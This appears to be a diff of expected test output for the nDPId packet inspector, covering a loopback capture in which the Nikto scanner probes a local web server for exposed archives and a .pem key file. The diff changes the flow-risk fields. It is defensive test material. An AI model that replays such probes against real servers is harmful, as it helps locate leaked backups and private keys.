 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
